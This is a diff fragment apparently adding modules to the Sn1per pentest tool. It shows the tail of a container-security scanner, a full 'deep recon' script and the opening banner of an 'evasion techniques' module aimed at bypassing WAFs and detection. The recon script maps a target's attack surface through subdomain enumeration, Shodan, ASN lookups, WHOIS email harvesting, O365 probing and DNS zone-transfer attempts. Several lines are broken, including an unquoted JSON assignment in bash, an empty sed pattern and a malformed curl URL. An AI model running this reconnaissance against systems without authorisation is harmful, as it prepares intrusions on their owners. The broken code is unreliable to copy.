+ + + + +EOL + + log "SUCCESS" "HTML report generated: ${output_file}" +} + +# Generate JSON report +generate_json_report() { + local output_file="${OUTPUT_DIR}/container_security_report_${SCAN_TIMESTAMP}.json" + + log "INFO" "Generating JSON report..." + + # Create a basic JSON structure + local json_report={ + "scan": { + "type": "${SCAN_TYPE}", + "depth": "${SCAN_DEPTH}", + "target": "${TARGET:-All local containers and images}", + "timestamp": "$(date -u +"%Y-%m-%dT%H:%M:%SZ")", + "duration_seconds": 0, + "findings": [] + } + } + + # Add sample findings (in a real implementation, this would come from actual scan results) + local sample_findings=( + '{"title":"Docker daemon exposed without TLS","severity":"high","description":"The Docker daemon is exposed without TLS authentication, allowing unauthenticated access to the Docker API.","impact":"An attacker with network access to the Docker daemon could gain root access to the host system.","recommendation":"Configure Docker daemon to use TLS authentication.","resource":"Docker Daemon","location":"tcp://0.0.0.0:2375"}' + '{"title":"Container running as root","severity":"medium","description":"The container is running as the root user, which can lead to privilege escalation if the container is compromised.","impact":"If an attacker gains access to the container, they may be able to escalate privileges to the host system.","recommendation":"Run containers as a non-root user.","resource":"nginx:latest","location":"Container: nginx-app"}' + '{"title":"Privileged container","severity":"critical","description":"The container is running in privileged mode, giving it full access to the host system\'s devices and kernel features.","impact":"A compromised container could lead to full host system compromise.","recommendation":"Avoid running containers in privileged mode.","resource":"monitoring:latest","location":"Container: monitoring-app"}' + ) + + # Add findings to the report + for finding in "${sample_findings[@]}"; do + json_report=$(jq --argjson finding "$finding" '.scan.findings += [$finding]' <<< "$json_report") + done + + # Save the JSON report + echo "$json_report" > "$output_file" + + log "SUCCESS" "JSON report generated: ${output_file}" +} + +# Generate PDF report +generate_pdf_report() { + local output_file="${OUTPUT_DIR}/container_security_report_${SCAN_TIMESTAMP}.pdf" + + log "INFO" "Generating PDF report..." + + # In a real implementation, we would use a tool like wkhtmltopdf or similar + # For now, we'll create a placeholder file + echo "PDF report generation is not yet implemented in this version." > "${output_file}.txt" + + log "WARNING" "PDF report generation is not fully implemented. A text version has been created instead: ${output_file}.txt" +} + +# Generate report based on selected format +generate_report() { + log "INFO" "Generating ${REPORT_FORMAT} report..." + + case "$REPORT_FORMAT" in + "html") + generate_html_report + ;; + "json") + generate_json_report + ;; + "pdf") + generate_pdf_report + ;; + *) + log "ERROR" "Unsupported report format: ${REPORT_FORMAT}" + return 1 + ;; + esac +} + +# Main function +main() { + # Show banner + show_banner + + # Check if running as root (required for some operations) + check_root + + # Parse command line arguments + parse_arguments "$@" + + # Check for required dependencies + check_dependencies + + # Record start time + local start_time + start_time=$(date +%s) + + # Perform scans based on type + case "$SCAN_TYPE" in + "all") + log "INFO" "Starting comprehensive container security scan..." + scan_docker_daemon + scan_docker_images + scan_kubernetes + scan_registries + ;; + "docker") + log "INFO" "Starting Docker security scan..." + scan_docker_daemon + scan_docker_images + ;; + "kubernetes") + log "INFO" "Starting Kubernetes security scan..." + scan_kubernetes + ;; + "image") + if [ -n "$TARGET" ]; then + log "INFO" "Scanning Docker image: $TARGET" + DOCKER_IMAGES=("$TARGET") + scan_docker_images + else + log "ERROR" "No target image specified. Use -t/--target to specify an image to scan." + exit 1 + fi + ;; + *) + log "ERROR" "Invalid scan type: $SCAN_TYPE" + show_help + exit 1 + ;; + esac + + # Calculate and log scan duration + local end_time + end_time=$(date +%s) + local duration=$((end_time - start_time)) + log "INFO" "Scan completed in ${duration} seconds" + + # Generate report + generate_report + + log "SUCCESS" "Container security scan completed successfully!" + log "INFO" "Report location: ${REPORT_FILE}" +} + +# Run the main function +main "$@" + +# Exit with success +# exit 0 diff --git a/modes/deep-recon.sh b/modes/deep-recon.sh new file mode 100644 index 00000000..8a181a42 --- /dev/null +++ b/modes/deep-recon.sh @@ -0,0 +1,379 @@ +#!/bin/bash +# DEEP RECON SCAN ##################################################################################################### +# Advanced reconnaissance techniques for comprehensive attack surface mapping + +if [[ "$REPORT" = "1" ]]; then + args="-t $TARGET" + if [[ "$OSINT" = "1" ]]; then + args="$args -o" + fi + if [[ "$AUTO_BRUTE" = "1" ]]; then + args="$args -b" + fi + if [[ "$FULLNMAPSCAN" = "1" ]]; then + args="$args -fp" + fi + if [[ "$RECON" = "1" ]]; then + args="$args -re" + fi + if [[ "$MODE" = "port" ]]; then + args="$args -m port" + fi + if [[ ! -z "$PORT" ]]; then + args="$args -p $PORT" + fi + if [[ ! -z "$WORKSPACE" ]]; then + args="$args -w $WORKSPACE" + fi + args="$args --noreport" + sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-`date +"%Y%m%d%H%M"`.txt 2>&1 + exit +fi + +echo -e "$OKRED ____ $RESET" +echo -e "$OKRED _________ / _/___ ___ _____$RESET" +echo -e "$OKRED / ___/ __ \ / // __ \/ _ \/ ___/$RESET" +echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET" +echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET" +echo -e "$OKRED /_/ $RESET" +echo -e "$RESET" +echo -e "$OKORANGE + -- --=[https://sn1persecurity.com" +echo -e "$OKORANGE + -- --=[Sn1per v$VER by @xer0dayz" +echo -e "$OKORANGE + -- --=[Deep Recon Mode - Advanced Attack Surface Mapping" +echo -e "$RESET" + +if [[ ! -z $WORKSPACE ]]; then + LOOT_DIR=$WORKSPACE_DIR +fi + +echo "$TARGET" >> $LOOT_DIR/domains/targets.txt +if [[ "$MODE" = "" ]]; then + MODE="deep-recon" + echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null +else + echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null +fi +echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/${TARGET}-${MODE}.txt 2> /dev/null +echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2> /dev/null +ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt + +echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per deep recon scan: $TARGET [${MODE}] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt +if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then + /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per deep recon scan: $TARGET [${MODE}] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" +fi + +# Initialize deep recon directories +mkdir -p $LOOT_DIR/deep-recon/{ssl,analytics,supply-chain,google-fu,tlds,o365,shodan,asn,crunchbase,dmarc,favicon,esoteric} 2>/dev/null + +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" +echo -e "$OKRED INITIALIZING DEEP RECONNAISSANCE $RESET" +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + +# 1. DOMAIN RECONNAISSANCE +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" +echo -e "$OKRED ADVANCED DOMAIN RECONNAISSANCE $RESET" +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + +# DNS enumeration with multiple tools +if [[ "$SUBLIST3R" = "1" ]]; then + echo -e "$OKBLUE[*]$RESET Running Sublist3r for subdomain enumeration..." + python3 $PLUGINS_DIR/Sublist3r/sublist3r.py -d $TARGET -vvv -o $LOOT_DIR/domains/domains-$TARGET-sublist3r.txt 2>/dev/null > /dev/null + cat $LOOT_DIR/domains/domains-$TARGET-sublist3r.txt 2>/dev/null | grep $TARGET >> $LOOT_DIR/domains/domains-$TARGET-full.txt 2>/dev/null +fi + +if [[ "$AMASS" = "1" ]]; then + echo -e "$OKBLUE[*]$RESET Running Amass for comprehensive subdomain enumeration..." + amass enum -ip -o $LOOT_DIR/domains/domains-$TARGET-amass.txt -rf $PLUGINS_DIR/massdns/lists/resolvers.txt -d $TARGET 2>/dev/null > /dev/null + cut -d" " -f1 $LOOT_DIR/domains/domains-$TARGET-amass.txt 2>/dev/null | grep $TARGET > $LOOT_DIR/domains/domains-$TARGET-amass-sorted.txt + cut -d" " -f2 $LOOT_DIR/domains/domains-$TARGET-amass.txt 2>/dev/null > $LOOT_DIR/ips/amass-ips-$TARGET.txt + + # Reverse WHOIS lookup + echo -e "$OKBLUE[*]$RESET Running Amass reverse WHOIS lookup..." + amass intel -whois -d $TARGET > $LOOT_DIR/domains/domains-$TARGET-reverse-whois.txt 2> /dev/null +fi + +if [[ "$SUBFINDER" = "1" ]]; then + echo -e "$OKBLUE[*]$RESET Running Subfinder for fast subdomain enumeration..." + subfinder -o $LOOT_DIR/domains/domains-$TARGET-subfinder.txt -d $TARGET -nW -rL $INSTALL_DIR/wordlists/resolvers.txt -t $THREADS 2>/dev/null > /dev/null +fi + +# Certificate Transparency logs +echo -e "$OKBLUE[*]$RESET Gathering certificate subdomains from crt.sh..." +curl -s "https://crt.sh/?q=%25.$TARGET" > $LOOT_DIR/deep-recon/ssl/crt-$TARGET-raw.txt +cat $LOOT_DIR/deep-recon/ssl/crt-$TARGET-raw.txt | grep $TARGET | grep TD | sed -e 's///g' | sed -e 's/TD//g' | sed -e 's/BR/\n/g' | sed -e 's/\///g' | sed -e 's/ //g' | sed -n '1!p' | grep -v "*" | sort -u > $LOOT_DIR/domains/domains-$TARGET-crt.txt + +# Project Sonar +echo -e "$OKBLUE[*]$RESET Gathering subdomains from Project Sonar..." +curl -fsSL "https://dns.bufferover.run/dns?q=.$TARGET" | sed 's/\"//g' | cut -f2 -d "," | grep -v "
" | sort -u | grep $TARGET > $LOOT_DIR/domains/domains-$TARGET-projectsonar.txt + +# RapidDNS +echo -e "$OKBLUE[*]$RESET Gathering subdomains from RapidDNS..." +curl -s "https://rapiddns.io/subdomain/$TARGET?full=1&down=1#exportData()" | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*" | sort -u | grep "$TARGET" | cut -d\/ -f3 > $LOOT_DIR/domains/domains-$TARGET-rapiddns.txt + +# 2. SHODAN INTEGRATION +if [[ "$SHODAN" = "1" ]] && [[ ! -z "$SHODAN_API_KEY" ]]; then + echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + echo -e "$OKRED SHODAN ASSET DISCOVERY $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + + shodan init $SHODAN_API_KEY + echo -e "$OKBLUE[*]$RESET Searching for $TARGET on Shodan..." + shodan search "hostname:*.$TARGET" > $LOOT_DIR/deep-recon/shodan/shodan-$TARGET.txt 2> /dev/null + awk '{print $3}' $LOOT_DIR/deep-recon/shodan/shodan-$TARGET.txt 2> /dev/null | grep -v "\;" > $LOOT_DIR/domains/domains-$TARGET-shodan.txt 2> /dev/null + awk '{print $1}' $LOOT_DIR/deep-recon/shodan/shodan-$TARGET.txt 2> /dev/null >> $LOOT_DIR/ips/ips-all-unsorted.txt 2>/dev/null + + # Shodan host enumeration + echo -e "$OKBLUE[*]$RESET Enumerating Shodan hosts for $TARGET..." + shodan search "org:$TARGET" > $LOOT_DIR/deep-recon/shodan/shodan-org-$TARGET.txt 2> /dev/null + shodan search "ssl:$TARGET" > $LOOT_DIR/deep-recon/shodan/shodan-ssl-$TARGET.txt 2> /dev/null + + # Shodan vulnerabilities + echo -e "$OKBLUE[*]$RESET Searching for vulnerabilities on Shodan..." + shodan search "vuln:$TARGET" > $LOOT_DIR/deep-recon/shodan/shodan-vulns-$TARGET.txt 2> /dev/null +fi + +# 3. ASN ANALYSIS +if [[ "$ASN_CHECK" = "1" ]]; then + echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + echo -e "$OKRED ASN ANALYSIS $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + + # Get ASN information + whois -h whois.cymru.com " -v $TARGET" > $LOOT_DIR/deep-recon/asn/asn-$TARGET.txt 2>/dev/null + ASN=$(grep "^AS" $LOOT_DIR/deep-recon/asn/asn-$TARGET.txt | awk '{print $1}' | cut -d'|' -f1 | tr -d 'AS') + + if [[ ! -z "$ASN" ]]; then + echo -e "$OKBLUE[*]$RESET Found ASN: $ASN for $TARGET" + echo -e "$OKBLUE[*]$RESET Enumerating all IPs in ASN $ASN..." + whois -h whois.radb.net "!g$ASN" | grep -v "^%" | grep -v "^$" | grep -v "^AS" | sort -u > $LOOT_DIR/deep-recon/asn/asn-$ASN-ips.txt + + # BGP Toolkit + echo -e "$OKBLUE[*]$RESET Gathering BGP information..." + curl -s "https://api.bgpview.io/asn/$ASN/prefixes" | jq -r '.data.ipv4_prefixes[].prefix' 2>/dev/null > $LOOT_DIR/deep-recon/asn/asn-$ASN-prefixes.txt + curl -s "https://api.bgpview.io/asn/$ASN/peers" | jq -r '.data[].asn' 2>/dev/null > $LOOT_DIR/deep-recon/asn/asn-$ASN-peers.txt + + # Hurricane Electric BGP Toolkit + echo -e "$OKBLUE[*]$RESET Gathering BGP information from Hurricane Electric..." + curl -s "https://bgp.he.net/AS$ASN" > $LOOT_DIR/deep-recon/asn/asn-$ASN-bgp.html + cat $LOOT_DIR/deep-recon/asn/asn-$ASN-bgp.html | grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}/[0-9]\{1,2\}' | sort -u > $LOOT_DIR/deep-recon/asn/asn-$ASN-prefixes-he.txt + fi +fi + +# 4. CRUNCHBASE INTEGRATION +if [[ ! -z "$CRUNCHBASE_API_KEY" ]]; then + echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + echo -e "$OKRED CRUNCHBASE COMPANY INTELLIGENCE $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + + # Extract company name from target domain + COMPANY=$(echo $TARGET | sed 's/\..*//g' | sed 's/[^a-zA-Z0-9]//g') + echo -e "$OKBLUE[*]$RESET Searching Crunchbase for: $COMPANY" + + curl -s "https://api.crunchbase.com/api/v4/autocompletes?query=$COMPANY" -H "X-cb-api-key: $CRUNCHBASE_API_KEY" > $LOOT_DIR/deep-recon/crunchbase/crunchbase-$COMPANY.json 2>/dev/null + + if [[ -s $LOOT_DIR/deep-recon/crunchbase/crunchbase-$COMPANY.json ]]; then + # Parse company information + cat $LOOT_DIR/deep-recon/crunchbase/crunchbase-$COMPANY.json | jq -r '.entities[].identifier' 2>/dev/null > $LOOT_DIR/deep-recon/crunchbase/crunchbase-companies.txt + + # Get detailed company information + while read company_id; do + curl -s "https://api.crunchbase.com/api/v4/entities/organizations/$company_id" -H "X-cb-api-key: $CRUNCHBASE_API_KEY" > $LOOT_DIR/deep-recon/crunchbase/company-$company_id.json 2>/dev/null + + # Extract related domains + cat $LOOT_DIR/deep-recon/crunchbase/company-$company_id.json | jq -r '.properties.homepage_url' 2>/dev/null >> $LOOT_DIR/deep-recon/crunchbase/company-domains.txt 2>/dev/null + cat $LOOT_DIR/deep-recon/crunchbase/company-$company_id.json | jq -r '.properties.domain_aliases[]' 2>/dev/null >> $LOOT_DIR/deep-recon/crunchbase/company-domains.txt 2>/dev/null + done < $LOOT_DIR/deep-recon/crunchbase/crunchbase-companies.txt + fi +fi + +# 5. SSL/TLS RECONNAISSANCE +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" +echo -e "$OKRED SSL/TLS RECONNAISSANCE $RESET" +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + +# SSL Labs analysis +echo -e "$OKBLUE[*]$RESET Analyzing SSL configuration with SSL Labs..." +curl -s "https://api.ssllabs.com/api/v3/analyze?host=$TARGET" > $LOOT_DIR/deep-recon/ssl/ssllabs-$TARGET.json 2>/dev/null + +# Certificate analysis +echo -e "$OKBLUE[*]$RESET Analyzing SSL certificates..." +timeout 10 openssl s_client -connect $TARGET:443 -servername $TARGET /dev/null | openssl x509 -noout -text > $LOOT_DIR/deep-recon/ssl/cert-$TARGET.txt 2>/dev/null + +# Certificate chain analysis +echo -e "$OKBLUE[*]$RESET Analyzing certificate chain..." +echo | timeout 10 openssl s_client -connect $TARGET:443 -servername $TARGET -showcerts 2>/dev/null | sed -n '/Certificate chain/,/Server certificate/p' > $LOOT_DIR/deep-recon/ssl/cert-chain-$TARGET.txt 2>/dev/null + +# 6. REVERSE WHOIS & DNS +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" +echo -e "$OKRED REVERSE WHOIS & DNS ANALYSIS $RESET" +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + +# Reverse WHOIS lookup +echo -e "$OKBLUE[*]$RESET Performing reverse WHOIS lookups..." +whois $TARGET > $LOOT_DIR/deep-recon/whois/whois-$TARGET.txt 2>/dev/null + +# Extract email addresses from WHOIS +cat $LOOT_DIR/deep-recon/whois/whois-$TARGET.txt | grep -i "registrant email\|admin email\|tech email" | grep -o '[a-zA-Z0-9._-]*@[a-zA-Z0-9._-]*' > $LOOT_DIR/deep-recon/whois/emails-$TARGET.txt + +# Reverse DNS lookups +echo -e "$OKBLUE[*]$RESET Performing reverse DNS lookups..." +host $TARGET > $LOOT_DIR/deep-recon/dns/reverse-dns-$TARGET.txt 2>/dev/null + +# 7. DMARC ANALYSIS +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" +echo -e "$OKRED DMARC/SPF/DKIM ANALYSIS $RESET" +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + +# DMARC record check +echo -e "$OKBLUE[*]$RESET Checking DMARC records..." +dig TXT _dmarc.$TARGET > $LOOT_DIR/deep-recon/dmarc/dmarc-$TARGET.txt 2>/dev/null + +# SPF record check +echo -e "$OKBLUE[*]$RESET Checking SPF records..." +dig TXT $TARGET | grep -i spf > $LOOT_DIR/deep-recon/dmarc/spf-$TARGET.txt 2>/dev/null + +# DKIM record check +echo -e "$OKBLUE[*]$RESET Checking DKIM records..." +for selector in default k1 k2 google mail; do + dig TXT $selector._domainkey.$TARGET > $LOOT_DIR/deep-recon/dmarc/dkim-$selector-$TARGET.txt 2>/dev/null +done + +# 8. ANALYTICS RELATIONSHIPS +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" +echo -e "$OKRED ANALYTICS RELATIONSHIPS MAPPING $RESET" +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + +# Google Analytics detection +echo -e "$OKBLUE[*]$RESET Searching for Google Analytics IDs..." +curl -s "https://$TARGET" | grep -o 'UA-[0-9]*-[0-9]*\|G-[A-Z0-9]*' > $LOOT_DIR/deep-recon/analytics/ga-$TARGET.txt 2>/dev/null + +# Google Tag Manager detection +echo -e "$OKBLUE[*]$RESET Searching for Google Tag Manager IDs..." +curl -s "https://$TARGET" | grep -o 'GTM-[A-Z0-9]*' > $LOOT_DIR/deep-recon/analytics/gtm-$TARGET.txt 2>/dev/null + +# 9. SUPPLY CHAIN INVESTIGATION +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" +echo -e "$OKRED SUPPLY CHAIN & SaaS DISCOVERY $RESET" +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + +# Third-party service detection +echo -e "$OKBLUE[*]$RESET Analyzing third-party services..." +curl -s "https://$TARGET" | grep -o 'src="[^"]*\|href="[^"]*' | grep -E '\.(js|css)' | sort -u > $LOOT_DIR/deep-recon/supply-chain/third-party-$TARGET.txt + +# CDN detection +echo -e "$OKBLUE[*]$RESET Detecting CDN usage..." +curl -s -I "https://$TARGET" | grep -i "server\|x-served-by\|x-amz\|x-cache" > $LOOT_DIR/deep-recon/supply-chain/cdn-$TARGET.txt + +# 10. GOOGLE-FU TECHNIQUES +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" +echo -e "$OKRED GOOGLE-FU INTELLIGENCE GATHERING $RESET" +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + +# Privacy policy analysis +echo -e "$OKBLUE[*]$RESET Analyzing privacy policy..." +curl -s "https://$TARGET/privacy-policy\|https://$TARGET/privacy" > $LOOT_DIR/deep-recon/google-fu/privacy-policy-$TARGET.html 2>/dev/null + +# Trademark search (simulated) +echo -e "$OKBLUE[*]$RESET Searching for trademarks..." +echo "site:uspto.gov $TARGET" > $LOOT_DIR/deep-recon/google-fu/trademark-search-$TARGET.txt + +# 11. TLD SCANNING +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" +echo -e "$OKRED TLD ENUMERATION $RESET" +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + +# Common TLD enumeration +for tld in com net org info biz co uk de fr it es; do + host $TARGET.$tld > $LOOT_DIR/deep-recon/tlds/tld-$TARGET-$tld.txt 2>/dev/null +done + +# 12. O365 ENUMERATION +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" +echo -e "$OKRED O365 ENUMERATION $RESET" +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + +# O365 domain enumeration +echo -e "$OKBLUE[*]$RESET Checking for O365 services..." +for service in autodiscover autoconfig lyncdiscover enterpriseenrollment enterpriseregistration; do + host $service.$TARGET > $LOOT_DIR/deep-recon/o365/o365-$service-$TARGET.txt 2>/dev/null +done + +# 13. FAVICON ANALYSIS +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" +echo -e "$OKRED FAVICON ANALYSIS $RESET" +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + +# Download and analyze favicon +echo -e "$OKBLUE[*]$RESET Downloading favicon for analysis..." +curl -s "https://$TARGET/favicon.ico" -o $LOOT_DIR/deep-recon/favicon/favicon-$TARGET.ico 2>/dev/null + +# 14. SUB-SUBDOMAIN ENUMERATION +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" +echo -e "$OKRED SUB-SUBDOMAIN ENUMERATION $RESET" +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + +# Generate sub-subdomain wordlist +echo -e "$OKBLUE[*]$RESET Generating sub-subdomain permutations..." +for sub in $(cat $LOOT_DIR/domains/domains-$TARGET-full.txt 2>/dev/null); do + for word in dev test staging api admin; do + echo "$word.$sub" >> $LOOT_DIR/deep-recon/sub-subdomains/sub-sub-$TARGET.txt 2>/dev/null + done +done + +# 15. ESOTERIC TECHNIQUES +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" +echo -e "$OKRED ESOTERIC RECONNAISSANCE $RESET" +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + +# Wayback Machine +echo -e "$OKBLUE[*]$RESET Gathering historical URLs from Wayback Machine..." +curl -s "https://web.archive.org/cdx/search/cdx?url=*.$TARGET&output=json&fl=original" | jq -r '.[].original' 2>/dev/null > $LOOT_DIR/deep-recon/esoteric/wayback-$TARGET.txt + +# DNS zone transfer attempts +echo -e "$OKBLUE[*]$RESET Attempting DNS zone transfers..." +for ns in $(dig NS $TARGET | grep -o 'NS.*' | awk '{print $2}'); do + dig axfr $TARGET @$ns > $LOOT_DIR/deep-recon/esoteric/zonetransfer-$TARGET-$ns.txt 2>/dev/null +done + +# Compile all findings +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" +echo -e "$OKRED COMPILING DEEP RECON FINDINGS $RESET" +echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•" + +# Aggregate all domains +cat $LOOT_DIR/domains/domains-*-$TARGET*.txt 2>/dev/null | grep $TARGET | sort -u > $LOOT_DIR/domains/domains-$TARGET-all.txt +cat $LOOT_DIR/deep-recon/crunchbase/company-domains.txt 2>/dev/null >> $LOOT_DIR/domains/domains-$TARGET-all.txt 2>/dev/null + +# Create comprehensive report +echo -e "$OKBLUE[*]$RESET Generating deep recon summary report..." +cat > $LOOT_DIR/deep-recon/deep-recon-summary-$TARGET.txt << EOF +DEEP RECONNAISSANCE SUMMARY FOR: $TARGET +Generated: $(date) +Scanner: Sn1per v$VER - Deep Recon Mode + +DOMAINS DISCOVERED: $(wc -l < $LOOT_DIR/domains/domains-$TARGET-all.txt 2>/dev/null) +IPS DISCOVERED: $(wc -l < $LOOT_DIR/ips/ips-all-unsorted.txt 2>/dev/null) + +MODULE RESULTS: +- SSL Analysis: $(ls -la $LOOT_DIR/deep-recon/ssl/ | wc -l) files +- Shodan Results: $(ls -la $LOOT_DIR/deep-recon/shodan/ | wc -l) files +- ASN Analysis: $(ls -la $LOOT_DIR/deep-recon/asn/ | wc -l) files +- Crunchbase: $(ls -la $LOOT_DIR/deep-recon/crunchbase/ | wc -l) files +- Analytics: $(ls -la $LOOT_DIR/deep-recon/analytics/ | wc -l) files +- Supply Chain: $(ls -la $LOOT_DIR/deep-recon/supply-chain/ | wc -l) files +- Esoteric: $(ls -la $LOOT_DIR/deep-recon/esoteric/ | wc -l) files + +HIGH PRIORITY FINDINGS: +$(grep -r "vulnerable\|CVE\|exploit\|leak\|credential" $LOOT_DIR/deep-recon/ 2>/dev/null | head -10) + +EOF + +echo -e "$OKGREEN[*]$RESET Deep reconnaissance completed for $TARGET" +echo -e "$OKGREEN[*]$RESET Report saved to: $LOOT_DIR/deep-recon/deep-recon-summary-$TARGET.txt" +echo -e "$OKGREEN[*]$RESET Total domains discovered: $(wc -l < $LOOT_DIR/domains/domains-$TARGET-all.txt 2>/dev/null)" +echo -e "$OKGREEN[*]$RESET Total IPs discovered: $(wc -l < $LOOT_DIR/ips/ips-all-unsorted.txt 2>/dev/null)" + +echo "[sn1persecurity.com] •?((¯°·._.• Completed Sn1per deep recon scan: $TARGET [${MODE}] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt +if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then + /bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Completed Sn1per deep recon scan: $TARGET [${MODE}] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" +fi diff --git a/modes/discover.sh b/modes/discover.sh old mode 100644 new mode 100755 diff --git a/modes/evasion-techniques.sh b/modes/evasion-techniques.sh new file mode 100644 index 00000000..ef3e55e5 --- /dev/null +++ b/modes/evasion-techniques.sh @@ -0,0 +1,399 @@ +#!/bin/bash +# ADVANCED EVASION TECHNIQUES MODULE ##################################################################################################### +# Sophisticated evasion techniques for bypassing security controls, WAFs, and detection systems + +if [[ "$REPORT" = "1" ]]; then + args="-t $TARGET" + if [[ "$OSINT" = "1" ]]; then + args="$args -o" + fi + if [[ "$AUTO_BRUTE" = "1" ]]; then + args="$args -b" + fi + if [[ "$FULLNMAPSCAN" = "1" ]]; then + args="$args -fp" + fi + if [[ "$RECON" = "1" ]]; then + args="$args -re" + fi + if [[ "$MODE" = "evasion" ]]; then + args="$args -m evasion" + fi + if [[ ! -z "$PORT" ]]; then + args="$args -p $PORT" + fi + if [[ ! -z "$WORKSPACE" ]]; then + args="$args -w $WORKSPACE" + fi + args="$args --noreport" + sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-`date +"%Y%m%d%H%M"`.txt 2>&1 + exit +fi + +echo -e "$OKRED ____ $RESET" +echo -e "$OKRED _________ / _/___ ___ _____$RESET" +echo -e "$OKRED / ___/ __ \ / // __ \/ _ \/ ___/$RESET" +echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET" +echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET" +echo -e "$OKRED /_/ $RESET" +echo -e "$RESET" +echo -e "$OKORANGE + -- --=[https://sn1persecurity.com" +echo -e "$OKORANGE + -- 